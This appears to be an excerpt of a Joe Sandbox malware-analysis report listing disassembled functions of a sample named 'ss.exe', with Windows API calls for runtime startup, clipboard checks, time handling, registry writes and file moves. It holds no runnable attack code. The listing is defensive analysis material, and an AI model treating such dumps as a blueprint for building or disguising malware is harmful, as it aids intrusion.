Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00487B7D, Relevance: 12.1, APIs: 8, Instructions: 98

Control-flow Graph

Executed
Not Executed

APIs

GetStartupInfoW.KERNEL32(?,004A16E8,00000058), ref: 00487B8D
HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000), ref: 00487BA2

Part of subcall function 00489251: HeapCreate.KERNELBASE(00000000,00001000,00000000,00487BF6), ref: 0048925A

Part of subcall function 00488B6B: GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00487C07), ref: 00488B73
Part of subcall function 00488B6B: GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,00487C07), ref: 00488B95
Part of subcall function 00488B6B: GetProcAddress.KERNEL32(00000000,FlsGetValue,?,00487C07), ref: 00488BA2
Part of subcall function 00488B6B: GetProcAddress.KERNEL32(00000000,FlsSetValue,?,00487C07), ref: 00488BAF
Part of subcall function 00488B6B: GetProcAddress.KERNEL32(00000000,FlsFree,?,00487C07), ref: 00488BBC
Part of subcall function 00488B6B: TlsAlloc.KERNEL32(?,00487C07), ref: 00488C0C
Part of subcall function 00488B6B: TlsSetValue.KERNEL32(00000000,?,00487C07), ref: 00488C27
Part of subcall function 00488B6B: GetCurrentThreadId.KERNEL32(?,00487C07), ref: 00488CCB

__RTC_Initialize.LIBCMT ref: 00487C13

Part of subcall function 0048AEA1: GetStartupInfoW.KERNEL32(?), ref: 0048AEAE
Part of subcall function 0048AEA1: GetFileType.KERNEL32(?), ref: 0048AFE1
Part of subcall function 0048AEA1: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 0048B017
Part of subcall function 0048AEA1: GetStdHandle.KERNEL32(-000000F6), ref: 0048B06B
Part of subcall function 0048AEA1: GetFileType.KERNEL32(00000000), ref: 0048B07D
Part of subcall function 0048AEA1: InitializeCriticalSectionAndSpinCount.KERNEL32(-004AD594,00000FA0), ref: 0048B0AB
Part of subcall function 0048AEA1: SetHandleCount.KERNEL32 ref: 0048B0D4

__amsg_exit.LIBCMT ref: 00487C26
GetCommandLineA.KERNEL32 ref: 00487C2C

Part of subcall function 0048DB3A: GetEnvironmentStringsW.KERNEL32 ref: 0048DB44
Part of subcall function 0048DB3A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0048DB82
Part of subcall function 0048DB3A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0048DBA5
Part of subcall function 0048DB3A: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0048DBB8
Part of subcall function 0048DB3A: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0048DBC4

Part of subcall function 0048DA7F: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\ss.exe,00000104), ref: 0048DAAB
Part of subcall function 0048DA7F: _parse_cmdline.LIBCMT ref: 0048DAD6
Part of subcall function 0048DA7F: _parse_cmdline.LIBCMT ref: 0048DB17

__amsg_exit.LIBCMT ref: 00487C4C

Part of subcall function 0048D809: _strlen.LIBCMT ref: 0048D833
Part of subcall function 0048D809: _strlen.LIBCMT ref: 0048D864

__amsg_exit.LIBCMT ref: 00487C5D

Part of subcall function 00484A99: __initterm_e.LIBCMT ref: 00484ACF

__amsg_exit.LIBCMT ref: 00487C70

Part of subcall function 00403AF0: RtlInitializeCriticalSection.NTDLL(004A90F0), ref: 00403B09
Part of subcall function 00403AF0: SetErrorMode.KERNELBASE(00000001), ref: 00403B11
Part of subcall function 00403AF0: GetCurrentDirectoryA.KERNEL32(00000104,C:\Users\user\Desktop), ref: 00403B21
Part of subcall function 00403AF0: FindWindowA.USER32(AutoHotkey,001B277C), ref: 00403E58
Part of subcall function 00403AF0: FindWindowA.USER32(AutoHotkey,001B277C), ref: 00403EBE
Part of subcall function 00403AF0: PostMessageA.USER32(00000000,00000044,00000406,00000000), ref: 00403ED5
Part of subcall function 00403AF0: Sleep.KERNEL32(00000014), ref: 00403EE5
Part of subcall function 00403AF0: IsWindow.USER32(00000000), ref: 00403EE8
Part of subcall function 00403AF0: Sleep.KERNEL32(00000014), ref: 00403F20
Part of subcall function 00403AF0: IsWindow.USER32(00000000), ref: 00403F23
Part of subcall function 00403AF0: Sleep.KERNEL32(00000064), ref: 00403F2F
Part of subcall function 00403AF0: SystemParametersInfoA.USER32(00002000,00000000,004A8DE4,00000000), ref: 00403F45
Part of subcall function 00403AF0: SystemParametersInfoA.USER32(00002001,00000000,00000000,00000002), ref: 00403F5F

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00455180, Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 392

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00454C70: VariantCopyInd.OLEAUT32(?,?), ref: 00454C9B

Part of subcall function 00454B90: VariantClear.OLEAUT32 ref: 00454BA1
Part of subcall function 00454B90: VariantChangeType.OLEAUT32(?,?,00000000), ref: 00454C00
Part of subcall function 00454B90: VariantClear.OLEAUT32(?), ref: 00454C11
Part of subcall function 00454B90: SysFreeString.OLEAUT32 ref: 00454C33

SysAllocString.OLEAUT32(|I), ref: 0045530F
SysFreeString.OLEAUT32(00000000), ref: 0045532D
SysFreeString.OLEAUT32(00000006), ref: 004554F9

Part of subcall function 00454470: SysStringLen.OLEAUT32(?), ref: 004544BE
Part of subcall function 00454470: VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 004547AE
Part of subcall function 00454470: VariantClear.OLEAUT32(?), ref: 0045484C

Part of subcall function 00454940: SysAllocString.OLEAUT32(0049E27C), ref: 00454A2E
Part of subcall function 00454940: SafeArrayCopy.OLEAUT32(00000000,00000000), ref: 00454AE0

Part of subcall function 00454D50: FormatMessageA.KERNEL32(00001200,00000000,?,00000000,?,00001000,00000000), ref: 00454DD1
Part of subcall function 00454D50: _vswprintf_s.LIBCMT ref: 00454E02
Part of subcall function 00454D50: SysFreeString.OLEAUT32(?), ref: 00454E32
Part of subcall function 00454D50: SysFreeString.OLEAUT32(00000000), ref: 00454E38
Part of subcall function 00454D50: SysFreeString.OLEAUT32(?), ref: 00454E3E

Part of subcall function 004555F0: SafeArrayCopy.OLEAUT32(?,?), ref: 004556E9
Part of subcall function 004555F0: SafeArrayDestroy.OLEAUT32(?), ref: 00455744
Part of subcall function 004555F0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0045577F
Part of subcall function 004555F0: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00455802
Part of subcall function 004555F0: SafeArrayGetDim.OLEAUT32(?), ref: 00455815
Part of subcall function 004555F0: SafeArrayLock.OLEAUT32(?), ref: 004558B8
Part of subcall function 004555F0: SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004558C9
Part of subcall function 004555F0: SafeArrayUnaccessData.OLEAUT32(?), ref: 00455939

Strings

|I, xrefs: 00455357
|I, xrefs: 004552D6, 0045530B, 004552D9, 0045530E
_NewEnum, xrefs: 0045526C

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004254D7, Relevance: 10.8, APIs: 7, Instructions: 277time

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

__alldiv.INT64 ref: 004255BE

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0042800A, Relevance: 10.7, APIs: 7, Instructions: 215timeregistry

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Part of subcall function 00413770: _strncpy.LIBCMT ref: 00413989
Part of subcall function 00413770: RegConnectRegistryA.ADVAPI32(?), ref: 004139AB

Part of subcall function 0046E900: RegCreateKeyExA.ADVAPI32(00000000,?,00000000,004987E9,00000000,?,00000000,?,?,00000000,004987E9,?,00000000,?,001B2FD0), ref: 0046E951
Part of subcall function 0046E900: RegSetValueExA.ADVAPI32(?,?,00000000,00000001,004987E9,004987EB,?,00000000,?,001B2FD0), ref: 0046E99A
Part of subcall function 0046E900: RegSetValueExA.ADVAPI32(?,?,00000000,00000002,004987E9,004987EB,?,00000000,?,001B2FD0), ref: 0046E9CA
Part of subcall function 0046E900: _strncpy.LIBCMT ref: 0046EA06
Part of subcall function 0046E900: RegSetValueExA.ADVAPI32(?,?,00000000,00000007,00000000,00000000,?,?,?,00000004,?,00000000,?,001B2FD0), ref: 0046EA59
Part of subcall function 0046E900: RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,00000000,?,00000000,?,001B2FD0), ref: 0046EB56
Part of subcall function 0046E900: RegCloseKey.ADVAPI32(?,?,?,00000000,?,001B2FD0), ref: 0046EB77
Part of subcall function 0046E900: RegCloseKey.ADVAPI32(?,?,00000000,?,001B2FD0), ref: 0046EBB3
Part of subcall function 0046E900: GetLastError.KERNEL32(?,00000000,?,001B2FD0), ref: 0046EBBE

RegCloseKey.ADVAPI32(00000000), ref: 004280B6

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00427F75, Relevance: 10.7, APIs: 7, Instructions: 206timeregistry

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Part of subcall function 00413770: _strncpy.LIBCMT ref: 00413989
Part of subcall function 00413770: RegConnectRegistryA.ADVAPI32(?), ref: 004139AB

Part of subcall function 0046E550: RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 0046E5BD
Part of subcall function 0046E550: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,00000000,?,?,00000000,?,?), ref: 0046E5E0
Part of subcall function 0046E550: RegCloseKey.ADVAPI32(?,?,?,00000000,?,?), ref: 0046E638
Part of subcall function 0046E550: GetLastError.KERNEL32(?,?,00000000,?,?), ref: 0046E647
Part of subcall function 0046E550: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,?,?), ref: 0046E667
Part of subcall function 0046E550: RegCloseKey.ADVAPI32(?,00000000,00000001,?,?,00000000,?,?), ref: 0046E68F
Part of subcall function 0046E550: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,004ABB26,?,00000000,00000001,?,?,00000000,?,?), ref: 0046E6F4
Part of subcall function 0046E550: RegCloseKey.ADVAPI32(?,?,?,00000000,?,?), ref: 0046E6FD
Part of subcall function 0046E550: RegCloseKey.ADVAPI32(?,00000000,00000001,?,?,?,?), ref: 0046E7B5
Part of subcall function 0046E550: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 0046E831
Part of subcall function 0046E550: RegCloseKey.ADVAPI32(?,?,?,00000000,?,?), ref: 0046E8D1

RegCloseKey.ADVAPI32(00000000), ref: 00427FFA

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0048AEA1, Relevance: 10.7, APIs: 7, Instructions: 196

Control-flow Graph

Executed
Not Executed

APIs

GetStartupInfoW.KERNEL32(?), ref: 0048AEAE

Part of subcall function 0048AC43: Sleep.KERNEL32(00000000,004719BE,004011C4), ref: 0048AC6B

GetFileType.KERNEL32(?), ref: 0048AFE1
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 0048B017
GetStdHandle.KERNEL32(-000000F6), ref: 0048B06B
GetFileType.KERNEL32(00000000), ref: 0048B07D
InitializeCriticalSectionAndSpinCount.KERNEL32(-004AD594,00000FA0), ref: 0048B0AB
SetHandleCount.KERNEL32 ref: 0048B0D4

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0042709B, Relevance: 10.7, APIs: 7, Instructions: 194time

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

MoveFileA.KERNEL32(004987E9,004987E9), ref: 004270B9

Part of subcall function 00451B70: GetFullPathNameA.KERNEL32(004987E9,00000104,?,?), ref: 00451B8D
Part of subcall function 00451B70: GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 00451BC8
Part of subcall function 00451B70: GetFileAttributesA.KERNEL32(?), ref: 00451BFD
Part of subcall function 00451B70: GetFileAttributesA.KERNEL32(?), ref: 00451C10
Part of subcall function 00451B70: SHFileOperation.SHELL32(00000000), ref: 00451D07

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00428304, Relevance: 10.7, APIs: 7, Instructions: 166time

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

OutputDebugStringA.KERNEL32(004987E9), ref: 0042830B

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00426C48, Relevance: 9.3, APIs: 6, Instructions: 283time

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
